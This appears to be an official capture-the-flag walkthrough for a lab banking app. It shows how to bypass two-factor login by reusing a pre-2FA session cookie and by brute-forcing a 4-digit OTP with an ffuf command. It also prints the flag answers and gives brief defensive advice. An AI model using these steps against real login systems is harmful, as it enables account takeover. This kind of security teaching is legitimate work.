HACKR.GG
hackr.gg — FirstBank — 2FA Bypass Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

FirstBank — 2FA Bypass

2FA Bypass · 2FA Authentication Bypass
Difficulty
Intermediate
Vuln class
2FA Authentication Bypass
Steps
3
// Objective
Bypass 2FA by skipping the OTP step (Flag 1) and brute-forcing the 4-digit OTP (Flag 2).
// Tools required
BrowserBurp Suiteffuf
// Step-by-step walkthrough
1
Log in and capture the session cookie
Submit the login form with valid credentials. Intercept the response — you receive a session cookie even before completing 2FA.
Command / Input
POST /login {"username":"user","password":"password123"}
Output
Set-Cookie: session=abc123 (pre-2FA session)
2
Skip the OTP step (Flag 1)
Use the pre-2FA session cookie to access /api/me directly, bypassing the OTP screen entirely. If the server doesn't validate OTP completion, you get access.
Command / Input
GET /api/me Cookie: session=abc123
Output
{"user":"alice","flag":"HackrGG{2f4_byp4ss_st3p_sk1pp3d}"}
The server grants access with an incomplete 2FA session — the step is enforced only in the UI.
3
Brute-force the admin OTP (Flag 2)
For the admin account, brute-force the 4-digit OTP (0000-9999). Use ffuf against the OTP endpoint.
Command / Input
ffuf -u http://TARGET/verify-otp -X POST -d '{"otp":"FUZZ"}' -w <(seq -w 0 9999) -mc 200
Output
HackrGG{2f4_0tp_bru73_f0rc3d}
OTPs need rate limiting and lockout — a 4-digit code is only 10,000 possibilities.
// Flag
Flag value
HackrGG{2f4_byp4ss_st3p_sk1pp3d}
Flag 1 via OTP step skip; Flag 2 via brute-force.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute